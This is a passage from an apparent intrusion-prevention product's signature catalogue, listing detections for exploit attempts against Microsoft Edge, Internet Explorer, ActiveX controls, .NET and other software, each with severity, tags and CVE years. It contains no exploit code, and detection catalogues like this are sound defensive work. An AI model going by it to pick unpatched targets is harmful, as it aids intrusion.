Tags: Any Operating System, Any Hardware, Metasploit, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1127-5242
Vulnerability: Metasploit-msfd-Browser-Remote-Code-Execution
Description:
Back to top

File-Text_MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MGI Systems LPViewer ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, iseemedia LPViewer, MGI Systems LPViewer, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Micro Focus Rumba detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Micro Focus Rumba, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution
Description:
Back to top

File-Text_Microsoft-.NET-Privilege-Escalation-CVE-2015-6096

About this situation: A vulnerability in Microsoft .NET
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-.NET-Privilege-Escalation-CVE-2015-6096
Description:
Back to top

File-Text_Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution

About this situation: Attempt to exploit a code execution vulnerability in Microsoft Access Snapshot Viewer detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Access Snapshot Viewer, MS2008-08, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-582-5211
Vulnerability: HTTP-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Access detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Office Access, MS2010-07, CVE2010, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-581-5211
Vulnerability: Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Data Access Components detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2012-07, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft Agent detected
Context: Text File Stream
Severity: 7
Tags: Windows 2000, Any Hardware, Microsoft Agent, MS2007-09, CVE2007, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Authentication-Failure

About this situation: A failed Microsoft authentication attempt detected
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: Microsoft-Authentication-Failure
Description:
Back to top

File-Text_Microsoft-Browser-Memory-Corruption-CVE-2016-0105

About this situation: Detected an attempt to exploit a vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-03, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Vulnerability: Microsoft-Browser-Memory-Corruption-CVE-2016-0105
Description:
Back to top

File-Text_Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge and Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-10, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Vulnerability: Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion
Description:
Back to top

File-Text_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability

About this situation: Attempt to access vulnerabile ActiveX component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft CAPICOM, Microsoft BizTalk Server, MS2007-05, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
Description:
Back to top

File-Text_Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252

About this situation: An attempt to exploit a code execution vulnerability in the Microsoft Data Analyzer ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
Description:
Back to top

File-Text_Microsoft-Defender-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Defender detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Windows Defender, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Vulnerability: Microsoft-Defender-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution

About this situation: An exploit against a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 10
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP2, Windows XP 64-bit SP2, Any Hardware, MS2009-09, CVE2009, Windows 2003 not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
Description:
Back to top

File-Text_Microsoft-DirectPlay-Heap-Overflow-Vulnerability

About this situation: A vulnerability in Microsoft DirectPlay
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 8, Windows 2012, Windows 2008, Any Hardware, MS2012-12, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-497-5211
Vulnerability: Microsoft-DirectPlay-Heap-Overflow-Vulnerability
Description:
Back to top

File-Text_Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-08, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529

About this situation: A Microsoft Edge And Internet Explorer Information Disclosure CVE-2017-8529 vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, MS2017-06, CVE2017, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529
Description:
Back to top

File-Text_Microsoft-Edge-Array.join-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-10, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Vulnerability: Microsoft-Edge-Array.join-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Asm.js-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-04, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-894-5242
Vulnerability: Microsoft-Edge-Asm.js-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Asmjsinterpreter-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-08, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-992-5242
Vulnerability: Microsoft-Edge-Asmjsinterpreter-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Edge-Boxstackinstance-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Boxstackinstance-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Arguments-Off-By-One

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-Edge-Chakra-Arguments-Off-By-One
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Array.map-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-10, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Microsoft-Edge-Chakra-Array.map-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Array.shift-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-835-5242
Vulnerability: Microsoft-Edge-Chakra-Array.shift-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1045-5242
Vulnerability: Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2017-08, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641

About this situation: An attempt to exploit a vulnerability in Microsoft Edge Chakra detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Edge, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1425-5242
Vulnerability: Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-764-5211
Vulnerability: Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ChakraCore, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1081-5242
Vulnerability: Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Vulnerability: Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-OP_memset-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: Microsoft-Edge-Chakra-OP_memset-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-10, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Vulnerability: Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Vulnerability: Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit
Description:
Back to top

File-Text_Microsoft-Edge-Code-Execution-CVE-2015-6168

About this situation: An attempt to exploit a vulnerability in Microsoft Edge Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Edge-Code-Execution-CVE-2015-6168
Description:
Back to top

File-Text_Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2015-2442

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2015-08, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2015-2442
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2015-2446

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2015-08, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2015-2446
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2015-6064

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Edge, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Edge-CVE-2015-6064
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-0003-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-01, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Edge-CVE-2016-0003-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-0161-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2016-0161-Privilege-Escalation
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-3222-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-06, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1347-5242
Vulnerability: Microsoft-Edge-CVE-2016-3222-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-3244-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-07, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1407-5242
Vulnerability: Microsoft-Edge-CVE-2016-3244-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-7200

About this situation: An attempt to trigger a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: Microsoft-Edge-CVE-2016-7200
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-7206

About this situation: An attempt to trigger a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-834-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2016-7206
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-7242

About this situation: An attempt to trigger a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2016-7242
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-7286-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2016-7286-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2016-7287

About this situation: An attempt to trigger a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-834-5242
Last changed: sgpkg-ips-834-5242
Vulnerability: Microsoft-Edge-CVE-2016-7287
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2017-0065-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Microsoft-Edge-CVE-2017-0065-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Edge-CVE-2017-8652-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-08, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-CVE-2017-8652-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-01, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Vulnerability: Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
